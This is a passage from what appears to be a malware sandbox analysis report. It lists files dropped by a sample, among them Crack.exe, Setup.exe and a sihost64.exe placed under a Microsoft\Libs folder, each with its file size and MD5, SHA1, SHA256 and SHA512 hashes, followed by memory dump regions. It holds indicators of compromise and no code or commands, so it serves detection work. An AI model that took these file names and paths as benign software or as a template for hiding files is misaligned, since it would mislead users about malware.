      SHA512

      50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b

    • \Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

      Filesize

      56KB

      MD5

      7126148bfe5ca4bf7e098d794122a9a3

      SHA1

      3fe6be3ee8bf1a0c99139b146913c8c6acd7dd64

      SHA256

      f8c0350d71e5dd14438d477f73915c4845290c7f0620656624722183b76013f5

      SHA512

      0bec6450d1be17489436de7a5186dbcb88089edd4227c3b5484460c9368e5ca0a2d88c385d31989f449a5d8cc347057c80a997682d6c0ed1b9cfcb85c677eb48

    • \Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe

      Filesize

      1.8MB

      MD5

      8902f8193024fa4187ca1aad97675960

      SHA1

      37a4840c9657205544790c437698b54ca33bfd9d

      SHA256

      95de484851569f225488320d573e398ebc2312b2d85b6c2b255b63b21aebb82f

      SHA512

      c351204604cb24c45ddb26847a22f5487a2942ad2b2361dbd31ce0a308c281be91658907d7fe04b483f053b7f9b0c680cae11361709ba7552f7921e727241938

    • \Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

      Filesize

      1.6MB

      MD5

      7009fb80a52366b6c2cd8ec052a65791

      SHA1

      db0894463edf3ac11e5ca4b4584e8f10d75810f6

      SHA256

      767c546decf6f669263e4a0a87a0f5d92234e031e9a0de3733fa954a8f3e0255

      SHA512

      26e50e4b3d0b5fe866423b9ae0c02f61882f632fe4a16c05da117c02fae9aea26a6c81458e4b0bc2bda8acd0407565132f8bd6b7d3e828dd90fc280b1f15f079

    • \Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe

      Filesize

      270KB

      MD5

      0388a1ce1bb8c076387b69ffcb3b40ec

      SHA1

      3ec08a53ec024d9be6346440848c37d0e0d7bb80

      SHA256

      448febc4311881856de2c237285907fe9470818e169946b0dbf1362f332e070a

      SHA512

      ea5af764d0373c8b9a5faf6d7094c76c9c321e227713bceecd49df50fa888e8fd04b1dfe16c4b75a8727717582b06383825e5d4317db1b875951ee240edd71d5

    • \Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe

      Filesize

      991KB

      MD5

      f250a9c692088cce4253332a205b1649

      SHA1

      109c79124ce2bda06cab50ea5d97294d13d42b20

      SHA256

      0a6c3a23510f93fcdcb6d5acc53ccccbcc51c68f14b1bcbd758ffbf135f8e882

      SHA512

      80553664f188ae35cef1f89d188fb17df8a490367f8d6fa5f9897115bacf776373905bccd599353add684c7fa6c2554d04cbf1a7f6cc87b299d6c51da33c1b5e

    • \Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe

      Filesize

      100KB

      MD5

      9a6071c1a67be3fb247f857fe5903bbf

      SHA1

      4a2e14763c51537e8695014007eceaf391a3f600

      SHA256

      01a9cb71df1d038bbec243ec7f2c1dd12d65a735297469c7f72be80886842e3c

      SHA512

      c862ed8670b48e23b081e1c91280599ffdd963e714665b80553b41540cb3584c823a25f05c75e47eaea1473c687a9ef7c9a219d724d059e5bd77ac6d127f5e68

    • \Users\Admin\AppData\Local\Temp\jhuuee.exe

      Filesize

      1.3MB

      MD5

      f9be28007149d38c6ccb7a7ab1fcf7e5

      SHA1

      eba6ac68efa579c97da96494cde7ce063579d168

      SHA256

      5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914

      SHA512

      8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171

    • \Users\Admin\AppData\Local\Temp\setup.exe

      Filesize

      314KB

      MD5

      0ebb4afbb726f3ca17896a0274b78290

      SHA1

      b543a593cfa0cc84b6af0457ccdc27c1b42ea622

      SHA256

      2fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2

      SHA512

      284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11

    • \Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

      Filesize

      7KB

      MD5

      9910203407b2605107587e954081c575

      SHA1

      8037bfb3b779fbbb3273df4f5c63d15b9589ce95

      SHA256

      07b00c604d6473439dcd16b47cbefa450aad400871cb2215f0814547aca81b49

      SHA512

      ba2c532d16eb259ae1621ac6ab668b4da28b2a842cb7320eee11982e2b835979c1ec6c566e3207e798fd2d0767070a568d2cd32dbb19200572afb2c7b32a68be

    • memory/528-119-0x0000000000400000-0x0000000002B59000-memory.dmp

      Filesize

      39.3MB

    • memory/800-98-0x0000000003850000-0x0000000003AB7000-memory.dmp

      Filesize

      2.4MB

    • memory/800-97-0x0000000003850000-0x0000000003AB7000-memory.dmp

      Filesize

      2.4MB

    • memory/1480-191-0x000000013F8C0000-0x000000013F8C6000-memory.dmp

      Filesize

      24KB

    • memory/2032-152-0x0000000000400000-0x0000000002B4E000-memory.dmp

      Filesize

      39.3MB

    • memory/2056-132-0x000000013F320000-0x000000013F330000-memory.dmp

      Filesize

      64KB

    • memory/2152-69-0x0000000000D20000-0x0000000000D28000-memory.dmp

      Filesize

      32KB

    • memory/2408-166-0x00000000008A0000-0x00000000008BE000-memory.dmp

      Filesize

      120KB

    • memory/2408-167-0x0000000000240000-0x000000000025A000-memory.dmp

      Filesize

      104KB

    • memory/2504-125-0x0000000000A70000-0x0000000000A7E000-memory.dmp

      Filesize

      56KB

    • memory/2504-68-0x000000013FF70000-0x000000013FF80000-memory.dmp

      Filesize

      64KB

    • memory/2804-45-0x0000000000220000-0x00000000003F6000-memory.dmp

      Filesize

      1.8MB

    • memory/2992-84-0x0000000000450000-0x000000000046A000-memory.dmp

      Filesize

      104KB

    • memory/2992-70-0x00000000008F0000-0x0000000000910000-memory.dmp

      Filesize

      128KB

    • memory/3008-133-0x0000000000400000-0x0000000000667000-memory.dmp

      Filesize

      2.4MB

    • memory/3008-120-0x0000000000400000-0x0000000000667000-memory.dmp

      Filesize

      2.4MB

    • memory/3008-100-0x0000000000400000-0x0000000000667000-memory.dmp

      Filesize

      2.4MB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.